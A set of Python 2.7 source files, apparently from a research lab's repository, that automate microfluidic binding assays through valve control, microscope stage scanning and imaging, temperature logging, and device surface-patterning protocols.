eh.scriptlogger.info('Letting oligo bind for %.1f minutes' % (remainingTime/60.0))
time.sleep(remainingTime)
# close neck valves and take prewash image
vc.closeValves(deviceNames,['neck'])
eh.scriptlogger.info('Finished binding, taking prewash images')
for device, note in list(zip(deviceNames, notes)):
prewash_note = note+'_PreWash'
ic.scan(eh.rootPath, prewashExposures, device, prewash_note, eh.posLists[device], wrappingFolder=True)
# close buttons, wash, and take postwash images
vc.closeValves(deviceNames,['b1','b2'])
# open buffer lines to waste
for device, bufferInput in list(zip(deviceNames, bufferInputs)):
vc.openValves([device], [bufferInput[:-1], 'w'])
eh.scriptlogger.info('Started flowing buffer through devices for washout ' + str(bufferInputs))
time.sleep(treeFlushTime)
vc.closeValves(deviceNames, ['w'])
vc.openValves(deviceNames, ['in', 'out', 's1', 's2'])
time.sleep(washoutTime)
for device, bufferInput in list(zip(deviceNames, bufferInputs)):
vc.closeValves([device], [bufferInput[:-1]])
vc.closeValves(deviceNames, ['in', 'out', 's1', 's2'])
eh.scriptlogger.info('Finished flowing buffer through devices for washout ' + str(bufferInputs))
eh.scriptlogger.info('>> Taking postwash images')
for device, note in list(zip(deviceNames, notes)):
postwash_note = note+'_PostWash'
ic.scan(eh.rootPath, postwashExposures, device, postwash_note, eh.posLists[device], wrappingFolder=True)
for device, competitorInput in list(zip(deviceNames, competitorInputs)):
vc.openValves([device], [competitorInput[:-1], 'w'])
time.sleep(treeFlushTime)
vc.closeValves(deviceNames, ['w'])
vc.openValves(deviceNames, ['in', 'out', 's1', 's2'])
eh.scriptlogger.info('Started flowing dark competitor through devices for washout ' + str(competitorInputs))
time.sleep(washoutTime)
for device, competitorInput in list(zip(deviceNames, competitorInputs)):
vc.closeValves([device], [competitorInput[:-1]])
vc.closeValves(deviceNames, ['in', 'out', 's1', 's2'])
eh.scriptlogger.info('Finished flowing dark competitor through devices for washout ' + str(competitorInputs))
dissociationConcurrent(deviceNames, competitorInputs, notes, points, dutyCycle, washoutTime, postwashExposures)
## nicole's scripts:
def flowProteinStartAssaysConcurrent(deviceNames, substrateInputs, bufferInputs, notes, equilibrationTime = 600, treeFlushTime = 20, bindingTime = 1800,
washoutTime = 600, postEquilibImageChanExp = {'6mCherry':[80]}, postWashImageChanExp = {'6mCherry':[1500], '4egfp':[500]}):
"""
Performs binding assay for a single protein dilution series.
Procedure:
1) Flush inlet tree
2) Flow protein onto device
3) Close sandwiches, open buttons, wait 30 min
4) Prewash mCherry imaging
5) Close buttons, wash 10 min
6) Postwash mCherry and eGFP imaging
Arguments
(list) deviceNames: list of the name of devices
(list) substrate inputs: list of input for DNA on each device
(list) buffer inputs: PBS inlets for both devices
(list) notes: oligo identities, in order of device name
equilibrationTime: time (sec) for equilibration of protein and protein (in seconds), standard is 30 minutes
treeFlushTime: time (sec) for flushing inlet tree of oligo before introducing onto device
bindingTime: time (sec) for equilibrating TF-DNA interaction
washoutTime: time (sec) for washing through buffer post binding measurement.
postEquilibImageChanExp: prewash Cy5 image channel and exposure settings
postWashImageChanExp: channels and exposures for postwash eGFP and Cy5 imaging
"""
eh.scriptlogger.info('>> Flowing protein, starting assay for device {} in lines {}'.format(str(deviceNames), str(substrateInputs)))
# Flush the inlet tree
eh.scriptlogger.info('The inlet tree wash started for protein in {}'.format(str(substrateInputs)))
vc.returnToSafeState(deviceNames)
for device, substrateInput in list(zip(deviceNames, substrateInputs)):
vc.openValves([device], [substrateInput[:-1], 'w'])
time.sleep(treeFlushTime)
eh.scriptlogger.info('The inlet tree wash done for protein in ' + str(substrateInput))
#Flow protein onto device, equilibrate for equilibrationTime
eh.scriptlogger.info('Chip equilibration started for substrate in ' + str(substrateInputs))
vc.closeValves(deviceNames, ['w'])
vc.openValves(deviceNames, ['in', 'out', 's1', 's2'])
time.sleep(equilibrationTime)
eh.scriptlogger.info('Chip equilibration done for substrate in ' + str(substrateInputs))
#Close things to prep for assay, and open buttons
for device, substrateInput in list(zip(deviceNames, substrateInputs)):
vc.closeValves([device], [substrateInput[:-1], 'in', 'out', 's1', 's2'])
time.sleep(1)
vc.openValves(deviceNames, ['b1', 'b2'])
eh.scriptlogger.info('Binding protein to buttons, no kinetics' + str(substrateInputs))
time.sleep(bindingTime)
# Obtain pre-wash mCherry no matter what
for device, note in list(zip(deviceNames, notes)):
ic.scan(eh.rootPath, postEquilibImageChanExp, device, note.replace(" ", "_")+'_PreWash_Quant', eh.posLists[device], wrappingFolder = True)
#Close things to prep for assay, and open buttons
eh.scriptlogger.info('The inlet tree wash started for buffers in ' + str(bufferInputs))
vc.returnToSafeState(deviceNames)
for device, bufferInput in list(zip(deviceNames, bufferInputs)):
vc.openValves([device], [bufferInput[:-1], 'w'])
time.sleep(treeFlushTime)
eh.scriptlogger.info('The inlet tree wash done for buffer in ' + str(bufferInputs))
# Flow buffer through chip
eh.scriptlogger.info('Started flowing buffer through devices for washout ' + str(bufferInputs))
vc.closeValves(deviceNames, ['w'])
vc.closeValves(deviceNames, ['b1', 'b2'])
time.sleep(0.5)
vc.openValves(deviceNames, ['in', 'out', 's1', 's2'])
time.sleep(washoutTime)
eh.scriptlogger.info('Done flowing buffer through devices for washout ' + str(bufferInputs))
for device, bufferInput in list(zip(deviceNames, bufferInputs)):
vc.closeValves([device], [bufferInput[:-1], 'in', 'out'])
for device, note in list(zip(deviceNames, notes)):
ic.scan(eh.rootPath, postWashImageChanExp, device, note.replace(" ", "_")+'_PostWash_Quant', eh.posLists[device], wrappingFolder = True)
vc.returnToSafeState(deviceNames)
|
FordyceLab/RunPack-STAMMP | runpack-stammp/io.py | <reponame>FordyceLab/RunPack-STAMMP
# title : io.py
# description : Top-level classes for Jupyter-based experimental
# MicroManager imaging & WAGO valve control
# authors : <NAME>
# date : 20180520
# version update : 20200913
# version : 0.1.1
# python_version : 2.7
import os
import sys
import time
import json
import logging
import warnings
import pandas as pd
import visa
from acqpack import Manifold
from acqpack import utils as ut
from acqpack import gui
################################################################################
class ExperimentalHarness:
posLists = {}
valvelogger = None
scriptlogger = None
acquilogger = None
userlogger = None
rootPath = ''
config = None
experimentalDescription = ''
assayTimes = {}
imagingRecord = pd.DataFrame()
def __init__(self, root, description, loggername = 'experiment'):
"""Experimental Harness constructor
TODO: refactor as parent class
Args:
(str) root: experimental root path. Location where images will be written.
(str) description: brterse exeperimental description
(str) loggername: custom name for the experimental logger. Will be
propogated to the experimental log.
Returns:
None
"""
ExperimentalHarness.rootPath = self.root = root
ExperimentalHarness.experimentalDescription = self.description = description
time.sleep(0.2)
self.initializeLogger(loggername)
def addPositionList(self, dname, path):
"""Adds a MicroManager position list to the experimental harness
Args:
(str) dname: device name ('d1' | 'd2' | 'd3')
(str) path: path of the MicroManager position list (.pos file)
Returns:
None
"""
posList = ut.load_mm_positionlist(path)
ExperimentalHarness.posLists[dname] = posList
logging.info('Added Position List for Device {}'.format(dname))
def removePositionList(self, dname):
"""Removes a MicroManager position list from the experimental harness
Args:
(str) dname: device name for harness to remove ('d1' | 'd2' | 'd3')
Returns:
None
"""
ExperimentalHarness.posLists.pop(dname)
logging.info('Remove Posiiton List for Device {}'.format(dname))
def note(self, note, importance = 0):
"""Writes a custom note to the user logger of the given importance
Args:
(str) note:
(int) importance: logging level. 0 = 'info', 1 = 'warning',
2 = 'error', 3 = 'critical' (0 | 1 | 2 | 3)
Returns:
None
"""
if importance == 1:
ExperimentalHarness.userlogger.warning(note)
elif importance == 2:
ExperimentalHarness.userlogger.error(note)
elif importance == 3:
ExperimentalHarness.userlogger.critical(note)
else:
ExperimentalHarness.userlogger.info(note)
def initializeLogger(self, name):
"""Initializes the loggers
These loggers include a valve logger, script logger, acquisition
logger, and user logger.
Args:
(str) name: log file name
Return:
None
"""
logging.basicConfig(level=logging.INFO,
format = '%(asctime)s %(name)-12s %(levelname)-8s %(message)s',
datefmt = '%y-%m-%d %H:%M:%S',
filename = os.path.join(self.root, '{}.log'.format(name)),
filemode = 'a+')
console = logging.StreamHandler()
console.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s %(name)-12s %(levelname)-8s %(message)s', '%y-%m-%d %H:%M:%S')
console.setFormatter(formatter)
# add the handler to the root logger
logging.getLogger('').addHandler(console)
logging.captureWarnings(True)
ExperimentalHarness.valvelogger = logging.getLogger('Valves')
ExperimentalHarness.scriptlogger = logging.getLogger('Script')
ExperimentalHarness.acquilogger = logging.getLogger('Acquisition')
ExperimentalHarness.userlogger = logging.getLogger('User')
def addAssayTimings(self, assayTimesDict):
"""Adds a dictionary of assay kinetic delay timings to the experimental harness.
Args:
(dict) assayTimesDict: dicitonary of assay timings of the form
{'name': [dt0, dt1, ..., dtf], ...}
Returns:
None
"""
for key in assayTimesDict.keys():
warnMsg = 'Harness already contained the assay time key: {}'.format(key)
if key in ExperimentalHarness.assayTimes.keys():
logging.warning(warnMsg)
ExperimentalHarness.assayTimes.update(assayTimesDict)
logging.info('Updated harness with assay times: {}'.format(assayTimesDict))
def removeAssayTimings(self, assayTimesKeys):
"""Removes a list of assay timings from the experimental harness
Args:
(list) assayTimesKeys: list of assay timings keys to remove from
the experimetnal harness
Returns:
None
"""
try:
list(map(ExperimentalHarness.assayTimes.pop, assayTimesKeys))
logging.info('Removed assay times from harness: {}'.format(assayTimesKeys))
except KeyError as e:
offendingKey = e.args[0]
errornote = 'Time list not present: {}'.format(offendingKey)
raise warnings.warn(note)
def toString(self):
"""A string description of the ExperimentalHarness
Args:
None
Returns:
str: Description of the experimental harness description
"""
stringVals = {'rp': ExperimentalHarness.rootPath,
'ed': ExperimentalHarness.experimentalDescription,
'pl': ExperimentalHarness.posLists.keys(),
'at': ExperimentalHarness.assayTimes
}
return 'Experimental Harness Current State: \n\
Root Path: {rp}\n\
Experimental Description: {ed}\n\
Position Lists: {pl}\n\
Assay Timings: {at}'.format(stringVals)
def __del__(self):
x = logging._handlers.copy()
for i in x:
logging.removeHandler(i)
i.flush()
i.close()
class HardwareInterface:
config = None
mmcfg = None
mm_version = None
setup = None
valvemapPath = None
manifoldAddress = None
manifoldOffset = None
channels = None
filterBlockName = None
valves = None
coreTimeout = 20000 #ms
core = None #MM core
temp = None #temperature & humidity probe
m = None #manifold
flowValves = None
controlValves = None
valveReferenceIndex = 'chip'
def __init__(self, loadAllHardware = True, configLoc = ''):
"""Hardware interface for control of camera/microscope, valving,
and sensors
TODO: refactor as parent class
Args:
(bool) loadAllHardware: flag to load all hardware available
(str) configLog: path of JSON configuration file
Returns:
None
"""
self.loadConfig(configLoc)
if loadAllHardware:
self.initializeHardware()
else:
logging.info('HardwareInterface Created. Add Hardware to Interface.')
logging.info('Experimental Description: {}'.format(
ExperimentalHarness.experimentalDescription)
)
def initializeHardware(self, subset = 'all'):
"""Initializes control of the hardware by adding it to the hardware interface.
Possible subsets are 'all', 'manifold', 'microscope', and 'temperature'.
Args:
subset (str): subset of hardware to initialize ('all' | 'manifold'
| 'microscope' | 'temperature'.)
Returns:
None
"""
if subset == 'all':
self.intializeManifoldControl()
self.initializeMicroManager()
self.initializeTempProbe()
elif subset == 'manifold':
self.intializeManifoldControl()
elif subset == 'microscope':
self.initializeMicroManager()
elif subset == 'temperature':
self.initializeTempProbe()
elif subset is None:
warnings.warn('No hardware was selected to initialize')
else:
raise ValueError('The requested hardware initialization failed. \
Specify a valid subset.')
def intializeManifoldControl(self):
"""Initialize connection to WAGO controller and manifold.
Args:
None
Returns:
None
"""
hi = HardwareInterface
HardwareInterface.m = Manifold(hi.manifoldAddress,
str(hi.valvemapPath),
hi.manifoldOffset)
HardwareInterface.m.valvemap.fillna('', inplace=True)
self.assignValvetypes()
logging.info('Manifold Control Established')
def assignValvetypes(self):
"""Assigns valves in the valvemap to type 'flow' or 'control' and adds to HardwareInterface.
Args:
None
Returns:
None
"""
valves = HardwareInterface.m.valvemap.copy().dropna()
device = valves['device'].drop_duplicates().tolist()[0]
valves['chipshort'] = valves.chip.apply(lambda v: v[:-1]) # Shorthand valve notation
HardwareInterface.flowValves = valves.loc[valves.layer == 'flow'].chipshort.drop_duplicates().tolist()
HardwareInterface.controlValves = valves.loc[valves.layer == 'control'].chipshort.drop_duplicates().tolist()
def initializeMicroManager(self):
"""Instantiates a MMCore instance
Args:
None
Returns:
None
"""
logging.info('Trying to Establish Microscope Control...')
sys.path.insert(0, HardwareInterface.mm_version) # make it so python can find MMCorePy
import MMCorePy
HardwareInterface.core = MMCorePy.CMMCore()
HardwareInterface.core.loadSystemConfiguration(str(HardwareInterface.mmcfg))
HardwareInterface.core.setTimeoutMs(HardwareInterface.coreTimeout)
logging.info('Microscope Control Established')
defaults = self.config['mm']['defaults']
self.setScopeConfig(exposure = defaults['exposure'], binning = defaults['binning'])
def initializeTempProbe(self):
"""Initializes connection to the temperature probe
Args:
None
Returns:
None
"""
th = HardwareInterface.config['temp_hum']
HardwareInterface.temp = TemperatureProbe(th['vid'], th['pid'])
HardwareInterface.temp.load()
logging.info('Temperature and Humidity Probe Connected')
def setScopeConfig(self, exposure = None, binning = None, channel = None):
"""Sets the camera configuration to the specified exposure, binning, and channel
Args:
exposure (int): camera exposure time (ms)
binning (str): camera binning ('1x1' | '2x2' | '3x3' | '4x4 | '6x6')
channel (str): camera channel, as per Channel preset group
defaults: 1pbp, 2bf, 3dapi, 4egfp, 5cy5
Returns:
None
"""
if exposure:
HardwareInterface.core.setProperty(HardwareInterface.core.getCameraDevice(),
"Exposure",
exposure)
logging.info('Camera Exposure Set: {}ms'.format(exposure))
if binning:
HardwareInterface.core.setProperty(HardwareInterface.core.getCameraDevice(),
"Binning",
str(binning))
logging.info('Camera Binning Set: {}'.format(binning))
if channel:
HardwareInterface.core.setConfig('Channel', str(channel))
logging.info('Camera Channel Set: {}'.format(channel))
# HardwareInterface.core.waitForDevice(HardwareInterface.filterBlockName)
HardwareInterface.core.waitForSystem()
def unloadHardware(self):
"""Unloads all hardware from the HardwareInterface
Args:
None
Returns:
None
"""
try:
HardwareInterface.m.exit()
logging.info('Manifold Control Unloaded')
except Exception:
warnings.warn('Could Not Unload Manifold')
pass
try:
HardwareInterface.core.unloadAllDevices()
logging.info('MicroManager Core Unloaded')
HardwareInterface.core.reset()
logging.info('MicroManager Core Reset')
except Exception:
warnings.warn('Could Not Unload Micromanager')
pass
try:
del(HardwareInterface.temp)
logging.info('Temperature Probe Disconnected')
except Exception:
warnings.warn('Could Not Disconnect Temp/Hum Probe')
pass
def loadConfig(self, c):
"""Loads a JSON experimental configuration.
Experimental configuration specifies hardware details and
ExperimentalHarness initial values.
Args:
c (str): config path
Returns:
None
"""
with open(c) as config_source:
HardwareInterface.config = json.load(config_source)['Hardware']
with open(c) as config_source:
ExperimentalHarness.config = json.load(config_source)['Software']
hc = HardwareInterface.config
mm = hc['mm']
wago = hc['wago']
th = hc['temp_hum']
HardwareInterface.mm_version = mm['version']
HardwareInterface.mmcfg = mm['config_loc']
HardwareInterface.setup = str(hc['setup_id'])
HardwareInterface.coreTimeout = int(mm['core_timeout'])
HardwareInterface.valvemapPath = str(wago['valvemap_path'])
HardwareInterface.manifoldAddress = wago['address']
HardwareInterface.manifoldOffset = wago['offset']
HardwareInterface.filterBlockName = mm['filterblock_name']
HardwareInterface.channels = [str(c) for c in mm['channels']]
at = {str(k):v for k, v in ExperimentalHarness.config['assay_timings'].items()}
ExperimentalHarness.assayTimes = at
def toString(self):
"""A string description of the HardwareInterface
Args:
None
Returns:
str: Description of the experimental harness description
"""
stringVals = {'vm': HardwareInterface.valvemapPath,
'ma': HardwareInterface.manifoldAddress,
'mmv': HardwareInterface.mm_version,
'mmc': HardwareInterface.mmcfg,
'f': HardwareInterface.channels}
return 'Hardware Interface Current State: \n\
Valvemap Path: {vm}\n\
Manifold Address Path: {ma}\n\
MicroManager Version: {mmv}\n\
MicroManager Config: {mmc}\n\
Filters: {f}\n'.format(**stringVals)
def __del__(self):
self.unloadHardware()
class TemperatureProbe:
def __init__(self, vid = '0x1313', pid = '0x80F8'):
"""Temperature Probe object for connection and query of Thorlabs TSP01
Args:
vid (str): Vendor ID (hex)
pid (str): Product ID (hex)
Returns:
None
"""
self.vid = vid
self.pid = pid
self.rm = visa.ResourceManager() #pyvisa
def load(self):
"""
Opens Thorlabs TSP01 temperature/humidity probe as pyvisa resource
Args:
None
Returns:
None
"""
for device in self.listVISAResources():
if self.vid in device and self.pid in device:
try:
self.inst = self.rm.open_resource(str(device))
except:
raise IOError('Connection to probe could not be established')
def getDeviceInfo(self):
"""Queries probe IDN
Args:
None
Returns:
dict: A dictionary of device ID fields to values
"""
fields = ['Model', 'SerialNo', 'FirmwareRev']
return dict(zip(fields, self.inst.query('*IDN?').split(',')))
def listVISAResources(self):
"""Lists available VISA resources
Args:
None
Returns:
list: Connected VISA resources
"""
return self.rm.list_resources()
def getOnboardTemp(self):
"""Query and return onboard temperature (celcius)
Args:
None
Return:
float: Onboard temperature (celcius)
"""
try:
temp = float(self.inst.query('SENS1:TEMP:DATA?'))
except:
warnings.warn('Could not read onboard probe temperature')
temp = 999.9
return temp
def getProbeTemp(self):
"""Query and return outboard temperature (celcius)
Args:
None
Return:
float: Outboard temperature (celcius)
"""
try:
temp = float(self.inst.query('SENS3:TEMP:DATA?'))
except:
warnings.warn('Could not read outboard probe temperature')
temp = 999.9
return temp
def getHumidity(self):
"""Query and return onboard humidity (realtive %)
Args:
None
Return:
float: Onboard humidity (%)
"""
try:
hum = float(self.inst.query('SENS2:HUM:DATA?'))
except:
warnings.warn('Could not read probe humidity')
hum = 999.9
return hum
def launchGUI(self, static_window = None):
"""TODO: Implement Jupyter widget for real-time temperature/humidity
"""
raise NotImplementedError('Real time temperature gui not implemented')
def __del__(self):
self.inst.close()
self.rm.close() |
FordyceLab/RunPack-STAMMP | runpack-stammp/imagingcontrol.py | <gh_stars>0
# title : imagingcontrol.py
# description : Imaging and stage control for RunPack experiments
# authors : <NAME>, <NAME>
# credits :
# date : 20180520
# version update : 20200913
# version : 0.1.1
# usage : With permission from DM
# python_version : 2.7
import os
import time
import datetime
import numpy as np
import pandas as pd
from PIL import Image
from Queue import Queue
import matplotlib.pyplot as pl
from acqpack import gui
from runpack.io import HardwareInterface as hi
from runpack.io import ExperimentalHarness as eh
################################################################################
hardwareQueue = Queue()
hardwareBlockingFlag = True
hardwareState = 0 #State: 0 = Resting, 1 = One Queue Complete, 2 = Both Complete
def snap(show = True, vmin = 0, vmax = 65535, figsize = (4, 4)):
"""Snaps an image and returns the resulting image array.
Args:
show (bool): flag to show image
vmin (int): threshold minimum
vmax (int): threshold max
figsize (tuple): matplotlib image figure size
Returns:
None
"""
hi.core.snapImage()
imgArr = hi.core.getImage()
if show:
pl.figure(figsize = figsize)
pl.imshow(imgArr, cmap='gray', vmin = vmin, vmax = vmax)
pl.title('Snapped Imaged, {}'.format(time.strftime("%Y%m%d-%H%M%S", time.localtime())))
pl.axis('off')
pl.show()
return imgArr
def live():
"""Wrapper for acqpack.gui.video() video acquisition function.
TODO: Enable live video saving to disk
Args:
None
Returns:
None
"""
gui.video(hi.core, loop_pause=0.05)
def startHardwareQueue():
"""Start the hardware job queue
Args:
None
Returns:
None
"""
eh.acquilogger.info('HardwareQueue Started')
while hardwareState < 2:
args, kwargs = hardwareQueue.get(block = hardwareBlockingFlag)
scan(*args, **kwargs)
def get_stage_position():
"""
TODO: Implement getting current stage position
"""
raise NotImplementedError('Fetching stage position not yet implemented.')
def move_stage_custom(x, y, z):
"""Immediately move the stage to a custom (x, y, z) position
Args:
(float) x: target stage x coordinate
(float) y: target stage y coordinate
(float) z: target stage z coordinate
Returns:
None
"""
hi.core.setXYPosition(x,y)
hi.core.waitForDevice(hi.core.getXYStageDevice())
hi.core.setPosition(hi.core.getFocusDevice(), z)
hi.core.waitForDevice(hi.core.getFocusDevice())
def move_stage_poslist(position_list, poslistIndex, zControl = True):
"""Move the xy(z) stage to cooredinates specified by the ith
entry in the position list. It is likely that you want to position list
in sorted order.
Args:
position_list (pd.DataFrame): stage xy(z) position list. z position
is not required. The default behavior is to move to z if present
poslistIndex (int): row index of position list to move to
zControl (bool): flag to move to home z position or retain current z
Returns:
None
"""
x,y = position_list[['x','y']].iloc[poslistIndex]
hi.core.setXYPosition(x,y)
hi.core.waitForDevice(hi.core.getXYStageDevice())
if ('z' in position_list.columns) and zControl:
z = position_list[['z']].iloc[poslistIndex]
hi.core.setPosition(hi.core.getFocusDevice(), z)
hi.core.waitForDevice(hi.core.getFocusDevice())
def home_stage(position_list, zControl = True):
"""Brings the stage to its initial pinlist position
Args:
position_list (pd.DataFrame): xy-stage or xyz-stage position list
zControl (bool): flag to move to home z position or retain current z
Returns:
None
"""
move_stage_poslist(position_list, 0, zControl = zControl)
def scan(data_dir, channelsExposures, dname, note, position_list,
wrappingFolder = False, write_imaging_record = True,
return_imaging_record = False, zControl = True):
"""Rastered image acquisition.
Acquires images in a raster patern and saves the results.
Writes metadata to the acquired images.
Args:
data_dir (str): root directory of image acquisitions
channelsExposure (dict): Dictionary of channels mapped to exposures
(e.g., {'2bf':[50, 500], '1pbp':[100, 200]})
dname (str): device name ('d1' | 'd2' |'d3')
note (str): Scan note, to be used in the image filename
position_list (pd.DataFrame): stage xy(z) position list
wrappingFolder (bool): flag to wrap acquistions inside another
directory of name notes
zControl (bool): flag to move to home z position or retain current z
Returns:
(pd.DataFrame | None): Pandas dataframe with a summary of the image raster
"""
def makeDir(path):
if not os.path.isdir(path):
os.makedirs(path)
messageItems = [str(dname), str(channelsExposures), str(note.replace(' ', '_'))]
startMessage = 'Started Scan of {}, channelsExposures = {}, note = {}'.format(*messageItems)
eh.acquilogger.info(startMessage)
if wrappingFolder:
timeString = time.strftime("%Y%m%d-%H%M%S", time.localtime())
scanfolder = (os.path.join(data_dir, '{}-{}_{}'.format(timeString, dname, note.replace(' ', '_'))))
data_dir = scanfolder
makeDir(scanfolder)
scanDirs = {}
startTime = time.strftime("%Y%m%d-%H%M%S", time.localtime())
for channel in channelsExposures.keys():
scan_dir = '{}_{}_{}'.format(startTime, note.replace(' ', '_'), channel)
scanDirs[channel] = scan_dir
outDir = os.path.join(data_dir, channel, scan_dir)
makeDir(outDir)
if hi.temp:
temp = hi.temp.getProbeTemp() # Get temperature for metadata
hum = hi.temp.getHumidity() # Get humidity for metadata
else:
temp = 999.9
hum = 999.9
scanRecord = []
for i in xrange(len(position_list)):
move_stage_poslist(position_list, i, zControl)
x,y = position_list[['x','y']].iloc[i]
for channel in channelsExposures.keys():
hi.core.setConfig('Channel', channel)
hi.core.waitForSystem()
timestamp = time.strftime("%Y%m%d-%H%M%S", time.localtime())
for exposure in channelsExposures[channel]:
hi.core.setProperty(hi.core.getCameraDevice(), 'Exposure', exposure)
hi.core.waitForDevice(hi.core.getCameraDevice())
hi.core.snapImage()
img = hi.core.getImage()
image = Image.fromarray(img)
timestamp = time.strftime("%Y%m%d-%H%M%S", time.localtime())
positionname = position_list['name'].iloc[i]
outPath = os.path.join(data_dir, channel, scanDirs[channel])
frameName = '{}/{}_{}.tif'.format(outPath, positionname, exposure)
imagePath = os.path.join(outPath, frameName)
summary = 'Device: {}, Note: {}, ExpDescription: {}'.format('Setup 3', note, eh.experimentalDescription)
frameInfo = '{{Channel: {}, Index:{}, Pos:({},{})}}'.format(channel, i, x, y)
frameTime = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
recordLabels = ['raster_start_time', 'scan_params', 'channel',
'exposure_ms', 'image_path', 'raster_index',
'x', 'y', 'dname', 'frame_time', 'temperature',
'humidity', 'note','setup', 'experimental_desc']
recordFeatures = [startTime, channelsExposures, channel, exposure,
imagePath, i, x, y, dname, frameTime, temp,
hum, note, hi.setup,
eh.experimentalDescription]
scanRecord.append(dict(zip(recordLabels, recordFeatures)))
exifIDs = [37888, 37889, 33434, 37510, 270, 306]
exifValues = [temp, hum, exposure/1000.0, summary, frameInfo, frameTime]
tags = dict(zip(exifIDs, exifValues))
image.save(imagePath, tiffinfo = tags)
messageItems = str(dname), str(channelsExposures), str(note.replace(" ", "_"))
endMessage = 'Completed Scan of {}, channelsExposures = {}, note = {}'.format(*messageItems)
eh.acquilogger.info(endMessage)
home_stage(position_list, zControl = zControl)
scanRecordDF = pd.DataFrame(scanRecord)
if write_imaging_record:
imageRecordsPath = os.path.join(eh.rootPath, 'imaging.csv')
imageRecordExists = os.path.isfile(imageRecordsPath)
with open(imageRecordsPath, 'a+') as ir:
if imageRecordExists:
scanRecordDF.to_csv(ir, header=False)
else:
scanRecordDF.to_csv(ir, header=True)
if return_imaging_record:
return scanRecordDF
class KineticAcquisition():
def __init__(self, deviceName, channelsExposures, delayTimes, description):
self.device = deviceName #either d1, d2, or d1d2
self.channelsExposures = channelsExposures # dict
self.delayTimes = delayTimes #as a tuple
self.absTimes = self.getTimeSpacings()
self.note = description.replace(" ", "_")
def getTimeSpacings(self):
"""
Given a list of delay times (in seconds), calculates the summed time elapsed from a reference time.
Args:
None
Returns:
list: List of summed delays from a common reference time (0)
"""
referencedDelayTimes = [0]+self.delayTimes
return np.cumsum(referencedDelayTimes).tolist()
def __str__(self):
"""Prints and returns a string representation of the kinetic acquisition parameters.
Args:
None
Returns:
str: KineticAcquisition parameters
"""
paramVals = [self.device,
self.channelsExposures,
str(self.absTimes),
str(self.delayTimes),
self.note]
params = 'Device Name: {}, Channels, Exposures: {}, \
Referenced Times (s): {}, Delay Times (s): {}, Note: {}'.format(*paramVals)
return '>> Kinetic Acquisition Parameters: {}'.format(params)
def startAssay(self, data_dir, position_list, scanQueueFlag = False):
"""Brings the stage home, schedules the scans, then starts the image acquisitions
Args:
data_dir (str): directory to write image folder
post_list (pd.DataFrame): position list
scanQueueFlag (bool): flag to add scan to the common scan queue
Returns:
None
"""
kineticSubfolder = '{}_{}'.format(time.strftime("%Y%m%d_%H%M%S",
time.localtime()),
self.note.replace(" ", "_")
)
kineticDirectory = os.path.join(data_dir, kineticSubfolder)
os.makedirs(kineticDirectory)
eh.acquilogger.info(self.__str__())
eh.acquilogger.info('Kinetic acquisition started: ' + str(self.note.replace(" ", "_")))
delaysToQueue = [0] + self.delayTimes
scanQueue = Queue()
list(map(lambda k: scanQueue.put(k), delaysToQueue))
lastScanTime = time.time()
while not scanQueue.empty():
nextScanDelay = scanQueue.get()
deltaTime = (nextScanDelay + lastScanTime) - time.time()
if deltaTime <= 0:
lastScanTime = time.time()
if scanQueueFlag == True:
args = [kineticDirectory,
self.channelsExposures,
self.device,
self.note.replace(" ", "_"),
position_list]
kwargs = {}
hardwareQueue.put((args, kwargs))
else:
scan(kineticDirectory,
self.channelsExposures,
self.device,
self.note.replace(" ", "_"),
position_list)
else:
time.sleep(deltaTime)
lastScanTime = time.time()
if scanQueueFlag == True:
args = [kineticDirectory,
self.channelsExposures,
self.device,
self.note.replace(" ", "_"),
position_list]
kwargs = {}
hardwareQueue.put((args, kwargs))
else:
scan(kineticDirectory,
self.channelsExposures,
self.device,
self.note.replace(" ", "_"),
position_list)
eh.acquilogger.info('Kinetic Read Complete')
|
FordyceLab/RunPack-STAMMP | runpack-stammp/mitomiprotocols.py | # description : STAMMP protocols for experimental acquisition
# authors : <NAME>, <NAME>
# date : 20180520
# version update : 20200913
# version : 0.1.1
# python_version : 2.7
import time
from Queue import Queue
import numpy as np
from apscheduler.schedulers.background import BackgroundScheduler
from apscheduler.schedulers.blocking import BlockingScheduler
from runpack import valvecontrol as vc
from runpack import imagingcontrol as ic
from runpack.io import HardwareInterface as hi
from runpack.io import ExperimentalHarness as eh
################################################################################
def patternDevices(devices, inletNames = None, blocknames = None):
"""Performs device surface patterning
Performs patterning on passed list of devices assuming standard input line
configuration (bBSA in 'bb', NeutrAvidin in 'NA', antibody in 'pHis', and
PBS in 'Hepes'). Be sure to attach a "waste tail" to the device, and open
all lines to pressure before executing.
Custom inlet names should be of the form {'na': [na_renamed], 'ph':
[ph_renamed], 'bb': [bb_renamed], 'hep': [bb_renamed], 'w': [w_renamed]}
Custom blocknames should be of the form ['bn1', 'bn2', 'bn3',..., 'bnn']
Blocks opening/closing will occur with inlet opening/closing
Args:
devices (list): list of devices to be patterned, lowercase (e.g.
['d1', 'd2', and 'd3'])
inletNames (dict): remapped inlet names containing precisely {'w':[
w_renamed], 'na': [na_renamed], 'ph': [ph_renamed],
'bb': [bb_renamed], 'hep': [bb_renamed]}. Should not contain trailing index.
blocknames (list): block control valve names of the form ['c1', 'c2', ..., 'c3'].
Valvenames should not containing trailing device index.
Returns:
None
"""
wasteValve = ['w']
buttonValves = ['b1', 'b2']
sandwichValves = ['s1', 's2']
inletValve = ['in']
outlet = ['out']
wasteValve = ['w']
naValve = ['na']
antibodyValve = ['ph']
bbsaValve = ['bb']
bufferValve = ['hep']
if inletNames:
wasteValve = inletNames['w']
naValve = inletNames['na']
antibodyValve = inletNames['ph']
bbsaValve = inletNames['bb']
bufferValve = inletNames['hep']
if blocknames:
inletValve = inletValve + blocknames
vc.returnToSafeState(devices) # Closing all valves
eh.scriptlogger.info('>> 1/18. Starting Device Patterning for devices {}. \
Starting with all valves closed. NOTE: flow of non-biotinylated BSA \
should have already been done'.format(devices))
eh.scriptlogger.info('2/18. Opening sandwiches, outlet, bBSA inlet, and waste. \
Flushing bBSA through inlet tree to waste for 30s')
vc.openValves(devices, sandwichValves + outlet + bbsaValve + wasteValve)
time.sleep(30)
eh.scriptlogger.info('3/18. Done Flushing bBSA to waste. Flushing bBSA through \
devices with buttons closed for 5min')
vc.closeValves(devices, wasteValve)
vc.openValves(devices, inletValve)
time.sleep(300)
eh.scriptlogger.info('4/18. Opened buttons with bBSA flowing through devices to waste for 35min')
vc.openValves(devices, buttonValves)
time.sleep(2100)
eh.scriptlogger.info('5/18. Done Flowing bBSA through devices and closed inlet. \
Flushing PBS through inlet tree to waste for 30s')
